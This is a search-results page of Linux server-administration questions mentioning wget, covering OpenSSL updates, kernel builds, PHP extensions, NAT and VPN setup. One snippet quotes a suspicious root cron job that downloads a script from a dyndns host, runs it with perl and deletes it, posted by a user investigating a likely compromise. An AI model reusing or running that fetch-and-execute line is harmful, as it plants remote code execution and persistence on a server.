Search Results

Search found 593 results on 24 pages for 'wget'.

Page 17/24 | < Previous Page | 13 14 15 16 17 18 19 20 21 22 23 24  | Next Page >

  • Update openssl in debian squeeze

    - by PiTheNumber
    There is this CVE-2014-0224 bug in openssl so I would like to update my affected # openssl version OpenSSL 0.9.8o 01 Jun 2010 But there is no update for squeeze. I read the it is already fixed in squeeze-LTS. What I am supposed to do? Will there be an fix for squeeze and I just need to wait? Should I install an openssl update manually? How? I tried to install openssl-0.9.8za and openssl-1.0.1h with wget, ./config, make, make install but openssl version is still that same. I also tried config parameters but with this build fails.

    Read the article

  • Why kernel source is not installed

    - by Subhajit
    I want to install kernel source in Ubuntu 12.04 which is not installed. I have checked the same using the following command : dpkg -s kernel Output is Kernel is not installed no information available Hence I have followed the following steps to install the same: 1.Installed the Dependencies by the following command: sudo apt-get install gcc libncurses5-dev git-core kernel-package fakeroot build-essential sudo apt-get update && sudo apt-get upgrade Download kernel source by the following command: wget http://www.kernel.org/pub/linux/kernel/v3.x/linux-3.5.tar.bz2 tar -xvf linux-3.5.tar.bz2 cd linux-3.5/ 3.Compiled the source code to generate the .deb packages by the following command make-kpkg clean fakeroot make-kpkg --initrd --append-to-version=-spica kernel_image kernel_headers Install the .deb packages (two .deb packages generated, one is to install the kernel headers, another one is to install the kernel image) by the following command sudo dpkg -i linux-*.deb But after reboot it seems kernel is not installed (checked by dpkg -s kernel). Please tell where I am going wrong. Also, In step 3, I guess I am installing a new kernel (named spica kernel_image) but during the boot up this new kernel is not showing as option. Please help me

    Read the article

  • Unable to load memcache.so extension ??

    - by billyduc
    I built php from source with configure command : './configure' '--prefix=/usr/local/php-5.2.8' '--with-config-file-path=/etc --with-config-file-scan-dir=/etc/php.d' '--with-apxs2=/usr/local/httpd/bin/apxs' '--with-mysql=/usr/local/mysql/' '--with-zlib' I installed php memcache extension : wget http://pecl.php.net/get/memcache tar -zxvf memcache-2.2.5.tgz cd memcache-2.2.5 phpize ./configure --enable-memcache make make install I add to my /usr/local/lib/php.in extension=memcache.so Rebooted my apache and run php-m but php seem doesn't load memcache extension I followed this solution from this site http://www.howtoforge.com/forums/showthread.php?t=26554 I added full path extension=/usr/local/lib/php/extensions/no-debug-non-zts-20060613/memcache.so rebooted apache But it didn't load memcache extension ! I google around but the same issue ! How can I load this extension _ _"

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

    Read the article

  • Keeping rackspace vserver alive

    - by mit
    It appears to me that rackspace somehow freezes cloud VMs after some idle time. This means the first page request to a php page takes much longer to respond than the subsequent requests. I am actually querying a machine with wget from a different host now to keep it "alive". But I wonder what frequency would be necessary. Does anyone know the time period after which they send a VM to "sleep"? I guess it would be some minutes. EDIT: There is no caching involved on the php site. It just recently moved from another vhost and there was never such latency on the first request.

    Read the article

  • Building boost 1.42 on FreeBSD 6.3

    - by Ivan Perekluyev
    Hi, i need to build mapnik on freebsd 6.3, but port marked as 'broken', so i forced to build it from source. With boost 1.41 (which is in ports) mapnik doesn't build. somewhere in internet, i found that mapnik successfully builded with boost 1.42. So, i download patch from wiki.freebsd.org/BoostPortingProject andd apply it: wget http://alexanderchuranov.com/boost-port/boost-from-1.41-to-1.42-2010-02-16-17-11.diff cd /usr/ports patch -p0 -i ~/boost-from-1.41-to-1.42-2010-02-16-17-11.diff after that, i trying to install boost-all metaport, but its failed. cd devel/boost-all make install 2>&1 | tee build.log tail -n 100 build.log > short_build.log Build.log (attention, 5m !): dl.dropbox.com/u/7365614/build.log Short build log: http://paste.pocoo.org/show/224474/ Thanks!

    Read the article

  • Howto configure openSuSE firewall to route local traffic to local ports

    - by Eduard Wirch
    I have openSUSE 11.3 installed. I'm using the openSUSE firewall configuration mechanism (/etc/sysconfig/SuSEfirewall2). I have a http server application running on port 8080. I want the http service to be accessible using port 80. I created a redirect rule usign: FW_REDIRECT="0/0,0/0,tcp,80,8080" This works fine for every request coming from external. But it doesn't for local requests. (example: wget http://myserver/) Is there a way how I can tell the firewall to redirect local requests addressed for 80 to port 8080? (using the SUSE firewall configuration file)

    Read the article

  • Can't connect to YouTube from specific network

    - by Tyilo
    Using my current network, I am unable to connect to http://www.youtube.com/. It doesn't matter what browser I use or if I use a cli-command (wget, curl). Error in Google Chrome: Oops! Google Chrome could not connect to www.youtube.com Error using curl: curl: (7) couldn't connect to host If I use nslookup to get the IP-address of YouTube, I get 173.194.32.32. If I go to http://173.194.32.32/ in my browser it can connect, but as Google is probably checking the Host HTTP-header, it shows Google's frontpage instead. There is no blocked websites on the router and other devices on the network seems to work. My computer only has this problem on this specific network. I am using Mac OS X 10.8.2 on a MacBook (mid 2009).

    Read the article

  • Help me to set samba and apache on my Ubuntu VM from Vista, starting from ping

    - by avastreg
    Ok the title is not so clear after all, so let's start with the problem description posting some points: i'm on Win Vista i have a Virtual Box Ubuntu 9.04 server (Virtual Machine) installed in windows i'm under Active Directory (maybe helps), with network 192.168.2.x After Ubuntu installation (LAMP), i have: Ubuntu Ip set to 10.0.2.15 (dhcp) Vista pings Ubuntu and Ubuntu pings Vista (only IPs, not names) Can't connect to Apache (default install ubuntu server) at the url h**p://10.0.2.15/ On Ubuntu, testing Apache by doing 'wget http://10.0.2.15/' works Tried to setup samba, writing a share def, but nothing, i can't access from Vista to Ubuntu My scope is: Setting up samba to work on files from windows Reaching apache to test web pages Ok i'm not completely noob (but i'm on the noob way anyway) and i've tried many solutions, so please try to help me; let's look together what went wrong :)

    Read the article

  • Setting up phpMemCacheAdmin on CentOS 5.5

    - by Bill Smith
    I have been able to setup phpMemCacheAdmin (http://code.google.com/p/phpmemcacheadmin/) on CentOS and am able to view the localhost MemCache statistics however whenever I add other MemCached nodes the config is never changed. I am fairly certain it has something to do with permissions however I am unable to track down what exactly needs to be done, or how to do it. The install was pretty straightforward: wget http://phpmemcacheadmin.googlecode.com/files/phpMemCacheAdmin-1.1.3r161.tar.gz tar xvzf phpMemCacheAdmin-1.1.3r161.tar.gz chmod +w Config/Memcache.ini But, it also states that Apache has rw right in the temp file folder (default : Temp/) and the entire config directory (Config/) -- that is the part I am unsure of. Help!

    Read the article

  • Is it possible to set a VPN through Tor? and have functionality for Software Updates?

    - by moazhmi
    Gday, I have been trying to do a software update on Trusty both on terminal and software update app but that hasnt been successful, apparently my ISP has a broken transparent proxy. moazhmi@moazhmi-K52F:~$ wget -S http://extras.ubuntu.com/ubuntu/dists/trusty/InRelease --2014-06-04 17:34:52-- http://extras.ubuntu.com/ubuntu/dists/trusty/InRelease Resolving extras.ubuntu.com (extras.ubuntu.com)... 91.189.92.152 Connecting to extras.ubuntu.com (extras.ubuntu.com)|91.189.92.152|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 213 Date: Wed, 04 Jun 2014 14:34:52 GMT Server: Apache/2.2.22 (Ubuntu) Connection: Keep-Alive Vary: Accept-Encoding Length: 213 [text/html] Saving to: ‘InRelease’ 100%[======================================>] 213 --.-K/s in 0s 2014-06-04 17:34:52 (22.1 MB/s) - ‘InRelease’ saved [213/213] I was advised to refer back to the ISP with a complaint but that has returned with peanuts. My Question is - Is it possible to set a VPN through TOR , i.e whereas I can run software updates through terminals or the app . the browsing is out of question here as I need to update which I am not able to do / only on 12.04.

    Read the article

  • installing jdk1.7.0 on Ubuntu 11.04 machine

    - by Yogesh
    I am facing a problem while trying to install Java 7 on Ubuntu. The following are the steps that I performed for installing: I installed the setup file from the link given below: wget http://download.oracle.com/otn-pub/java/jdk/7u1-b08/jdk-7u1-linux-x64.tar.gz I have a file: jdk-7u1-linux-x64.tar.gz I Untared it: tar -xvf jdk-7u1-linux-x64.tar.gz sudo mv ./jdk1.7.0_01 /usr/lib/jvm/jdk1.7.0_01 sudo update-alternatives –config java Here it gave me the following output: There is only one alternative in link group java: /usr/lib/jvm/java-6-sun/jre/bin/java Nothing to configure. sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_01/jre/bin/java 1(I entered 1 here.) sudo update-alternatives --config java java -version. It showed the following output java version "1.6.0_26" Java(TM) SE Runtime Environment (build 1.6.0_26-b03) Java HotSpot(TM) 64-Bit Server VM (build 20.1-b02, mixed mode) I am not sure if jdk1.7.0 is installed as its showing the version as 1.6.0_26.

    Read the article

  • How to get LAN ip to a variable in a Windows batch file

    - by Ville Koskinen
    I'm streaming audio from my Windows 7 laptop to a sound card attached to a router. I have a little batch script to start streaming. REM Kill any instances of vlc taskkill /im vlc.exe "c:\Program Files\VideoLAN\VLC\vlc.exe" <parameters to start http streaming> REM Wait for vlc TIMEOUT /T 10 REM start playback on router plink -ssh [email protected] -pw password killall -9 madplay plink -ssh [email protected] -pw password wget -q -O - http://192.1.159:8080/audio | madplay -Q --no-tty-control - & As you see the http stream is hard coded. It would be nice to get the address dynamically to reuse the script on other machines. Any ideas?

    Read the article

  • mplayer dumpstream sometimes fails

    - by User1
    I'm trying to rip the video at http://videolectures.net/ecml07%5Fgetoor%5Fisr/, so I can play it at a faster speed. I paste http://193.2.4.216/2007/pascal/ecml07%5Fwarsaw/getoor%5Flise/ecml07%5Fgetoor%5Fisr%5F01.wmv into a firefox browser in Windows and MediaPlayer plays the thing. However if I try mplayer -dumpstream, it gets stuck into an infinite loop trying to play the file. If I use wget to download the link, I get a small text file which basically points to the same URL. How can I get mplayer to download this stream?

    Read the article

  • How do I install something from source and make it available to root?

    - by pwny
    I have a CentOS VM and I need to install the latest version of Ruby on it. Unfortunately, yum only makes Ruby 1.8.6 available so I'm trying to install Ruby from source. Here's what I'm using: cd /usr/src sudo -s wget http://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.3-p125.tar.gz tar -xvzf ruby-1.9.3-p125.tar.gz cd ruby-1.9.3-p125 ./configure make && make install The problem is that once that's done, I can only use Ruby as a regular user but I need to use it as root to install some gems. For example, as a regular user I can do ruby -v and it works but sudo ruby -v outputs bash: ruby: command not found. What am I missing to make stuff I install from source available to all users?

    Read the article

  • How to install custom c library?

    - by arijit
    I just wanted to add a c library to Ubuntu which was created by Harvard University for cs50 course. They provided instructions for how to install the library which is listed below. Debian, Ubuntu First become root, as with: sudo su - Then install the CS50 Library as follows: apt-get install gcc wget http://mirror.cs50.net/library/c/cs50-library-c-3.1.zip unzip cs50-library-c-3.1.zip rm -f cs50-library-c-3.1.zip cd cs50-library-c-3.1 gcc -c -ggdb -std=c99 cs50.c -o cs50.o ar rcs libcs50.a cs50.o chmod 0644 cs50.h libcs50.a mkdir -p /usr/local/include chmod 0755 /usr/local/include mv -f cs50.h /usr/local/include mkdir -p /usr/local/lib chmod 0755 /usr/local/lib mv -f libcs50.a /usr/local/lib cd .. rm -rf cs50-library-c-3.1 I did exactly as directed. But the compiler reported “Undefined reference to a function”--the function was Get String. So, I searched for a solution and found one. It said to use the -l switch. Now when I compile I use something like: gcc –o hello.c hello –lcs50 (I don’t remember the exact command.) However, I cannot use the make command, which is easier to use. I understand that there is some problem with linking the library. What is a good solution to this problem?

    Read the article

  • Download a file via HTTP from a script in Windows

    - by Jason R. Coombs
    I want a way to download a file via HTTP given its URL (similar to how wget works). I've seen the answers to this question, but I have two changes to the requirements: I'd like it to run on Windows 7 or later (though if it works on Windows XP, that's a bonus). I need to be able to do this on a stock machine with nothing but the script, which should be text that could be easily entered on a keyboard or copy/pasted. The shorter, the better. So, essentially, I'd like a .cmd (batch) script, VBScript, or Powershell script that can accomplish the download. It could use COM or invoke IE, but it needs to run without any input, and should behave well when invoked without a display (such as through a telnet session).

    Read the article

  • Problem with dpkg-preconfigure, how to correct?

    - by Eric Wilson
    I was trying to install TeamViewer, and I followed the instructions here even though they specify 11.10 instead of 12.04 (what I'm running). In particular, I executed. $ wget http://www.teamviewer.com/download/teamviewer_linux.deb $ sudo dpkg -i teamviewer_linux.deb The dpkg command failed, and after this point my packaging system has been broken. The software center instructs me to try: $ sudo apt-get -f install which leads to Reading package lists... Done Building dependency tree Reading state information... Done Correcting dependencies... Done The following packages will be REMOVED: teamviewer7:i386 0 upgraded, 0 newly installed, 1 to remove and 17 not upgraded. 9 not fully installed or removed. Need to get 89.0 kB of archives. After this operation, 81.9 MB disk space will be freed. Do you want to continue [Y/n]? y Get:1 http://us.archive.ubuntu.com/ubuntu/ precise/main dash amd64 0.5.7-2ubuntu2 [89.0 kB] Fetched 89.0 kB in 1s (83.9 kB/s) E: Sub-process /usr/sbin/dpkg-preconfigure --apt || true returned an error code (100) E: Failure running script /usr/sbin/dpkg-preconfigure --apt || true At this point I'm stumped.

    Read the article

  • Linux servers seeing bad download performance behind Sonicwall firewall

    - by Joshua Penix
    I'm working with a pair of co-located CentOS Linux servers sitting behind a Sonicwall PRO 2040 Enhanced firewall running in transparent bridge mode. These servers are having a strange problem downloading files more than a few megabytes in size. For example, if I try to wget or FTP a copy of the Linux kernel from kernel.org, the first ~1-2MB will download at 600+K/s, and then throughput will drop off a cliff to 1K/s. I've reviewed all the firewall configuration settings for anything suspicious, but found nothing. More interestingly, I performed the same download with a Windows server sitting behind the same firewall, and it sailed right through at 600+K/s the whole way. Has anyone seen this? Where should I start looking to troubleshoot this problem?

    Read the article

  • Linux + IPTables + NAT = some http hosts unreachable.

    - by Daniel
    Hi. I've set up dead simple NAT: iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o ppp0 -j MASQUERADE Everything works almost ok. Almost. The problem I've expirienced is some hosts are not reachable by NAT clients, i.e. there's http://code.jquery.com/jquery-1.4.2.min.js - I can download it from server, but in case of NAT client download stalls on connection stage. I thought its FFs fault, but wget has the same issue. I didn't find any logs/messages that can shed some light on this situtation. Any ideas what's going on? Maybe some tricky thing in sysclt is causing this? P.S. 3/3 client boxes are expiriencing this issue. This is definitely server trouble.

    Read the article

  • apt-get update stuck on "Waiting for Headers"

    - by crasic
    I'm setting up a Maverick server on a spare PC. The install completes fine and the system boots up into the shell. However, when I try to do a apt-get update , apt hangs on almost every entry with the message 99% [Waiting for headers] sometimes a message of 96 b/s appears on the far right. The actual percent that it claims also varies. Searching around online gave a potential solution by using the option Acquire::http::Pipeline-Depth="0" this somewhat alleviates the problem, i.e. it stalls on every other entry with the same message as above. If you wait it out (the whole update took about 4 hours), the update still fails as a good portion of the hits show a "unable to connect" or similar message, despite the fact that I can ping the server from the pc just fine. The problem is also unrelated to the mirror used since I've tried about a dozen mirrors with no success, I've even tried commenting out everything but the main entry in sources.list and it still refuses to update. The network connection is fine since I can ping and wget (apt won't let me install lynx until I run a successful update) just fine. I've also reinstalled the distro with no luck. The only thing weird about the setup is that the PC is connecting to the internet through my windows laptop with ICS configured properly, but as I've said before, the network connection is fine.

    Read the article

  • How do I modify these VPN connection settings for Xfce?

    - by Dave M G
    I have signed up for a VPN (Virtual Private Network) service, and I configured it for use on my computer that runs Gnome Classic with the following instructions: In Terminal, install openvpn packages with sudo apt-get install network-manager-openvpn. 1. Restart the network manager with sudo restart network-manager 2. Run sudo wget https://www.xxxxxxx.com/ovpnconfigure.zip 3. Extract the files from the zip with unzip ovpnconfigure.zip. 4. Move cert.crt to /etc/openvpn 5. Open the Network Manager on the menu bar. 6. Choose add and select the OpenVPN connection type, and click Create. 7. Enter Private Internet Access SSL for the Connection Name. 8. Enter xxxxxx.xxxxxxxx.com for the Gateway 9. Select Password and enter your login credentials. 10. Browse and select the CA Certificate we saved in Step 3. 11. Choose Advanced and enable LZO Compression. 12. Apply and exit. 13. Connect using the Network Manager. It worked, but now I want to set up access to the same VPN service on another machine that runs Mythbuntu, which uses Xfce as its desktop manager. So every point from 5 on doesn't apply. How can I modify the above instructions so that I can get my VPN service working with Xfce. As a further note, while I can access the Xfce desktop directly if I need to, it's more convenient for me to access it via the command line and SSH from on of my other computers. A command line process would be ideal. (I looked for this, and found instructions only for PPTP access, whereas I need OpenVPN.)

    Read the article

  • Oh snap! My RPi was upgraded to 512MB! Woo-hoo!

    - by hinkmond
    I ordered a Raspberry Pi Model B (256MB) over 4 months ago on backorder. When it finally came I saw it was upgraded to the new half a gig model! Woot! But, all was not perfect. Gary C. told me the shipped configuration of the new RPi models didn't have the right firmware for 512MB, and I had to upgrade the start.elf in the /boot directory to recognize all of the 512MB RAM. I did a "free" command, and sure enough saw only 240MB. Sadness. But, Gary gave me a copy of his start.elf which worked after some trail and error. For anyone ordering the new RPi Model B w/512MB, here are the steps to get you going with full 512MB RAM: sudo apt-get update --fix-missing sudo apt-get upgrade --fix-missing # NOTE: This step takes at least a couple hours on a # fast network wget https://raw.github.com/raspberrypi/firmware/\ 164b0fe2b3b56081c7510df93bc1440aebe45f7e/boot/\ arm496_start.elf sudo mv /boot/start.elf /boot/orig-start.elf sudo mv arm496_start.elf /boot/start.elf sudo reboot free total used free shared buffers cached Mem: 497768 210596 287172 0 16892 169624 -/+ buffers/cache: 24080 473688 Swap: 102396 0 102396 So of course this means... (drumroll) there is now 498MB available for the Java Embedded heap! java -Xmx400m -version java version "1.7.0_06" Java(TM) SE Embedded Runtime Environment (build 1.7.0_06-b24, headless) Java HotSpot(TM) Embedded Client VM (build 23.2-b09, mixed mode) Yeah, baby! Hinkmond

    Read the article

  • How can I enable readline for PHP 5.4 on Ubuntu 11.10?

    - by dotweb
    I installed PHP 5.4 on my Ubuntu 11.10 PC like this: $ sudo add-apt-repository ppa:ondrej/php5 $ sudo apt-get update $ sudo apt-get install php5 It's working fine but I don't have the readline function anymore that I need for my PHP CLI scripts. libreadline-dev is installed and readline was working perfectly in 5.3. I also tried to compile 5.4 with readline: $ wget http://de2.php.net/get/php-5.4.0.tar.gz/from/de.php.net/mirror $ tar xzvf mirror $ cd php-5.4.0/ $ ./configure --with-readline $ make test But the last command echoed this error after compiling for some minutes: FAILED TEST SUMMARY Test 7: DTD tests [ext/dom/tests/dom007.phpt] You may have found a problem in PHP. I appreciate any help on how to get readline working!

    Read the article

  • Ubuntu One, compressed files

    - by user8179
    I have uploaded some files to my Ubuntu One account and it seems to work great most of the time. I usually upload them directly from Nautilus by right clicking the folder, using the ”Synchronize this folder” option, and then I make sure that the file I want to upload is published. Then I usually test the whole thing by trying to download it. I right click the file again to get its URL and I paste it into my Web browser. This usually works fine. But yesterday I uploaded two compressed files – ”.tar.bz2”. When I tried to open them after downloading them with my Web browser (Opera), it failed. I found that the file was bigger than the original file (2358 B instead af 2335 B – 15 B added at the beginning of the file and 8 B added to the end), and someone at the Opera channel (IRC) at OperaNet (Europe) figured out that the reason for this is that the server compress the file again, ”without telling Opera”. So to be able to extract the file I need to add ”.gz” to the file name and then extract it twice. If I downloaded it with Firefox however, I didn't need to do that, so maybe Firefox figured this out somehow in a way that Opera does not. Someone also tried to download the file with wget and some other browser and he also got the same result as I did with Opera, that is the file is compressed a second time by the server. I guess ”the server” is the Ubuntu One server, right? So why is this? Could it be done better somehow? Or did I do something wrong when uploading the files? It also seems like this extra compressing thing does not always happen, because when I tried again a few minutes ago, the file came down with its right size (2335 B), without an extra compression. But the other file (114 MiB) was still compressed twice.

    Read the article

< Previous Page | 13 14 15 16 17 18 19 20 21 22 23 24  | Next Page >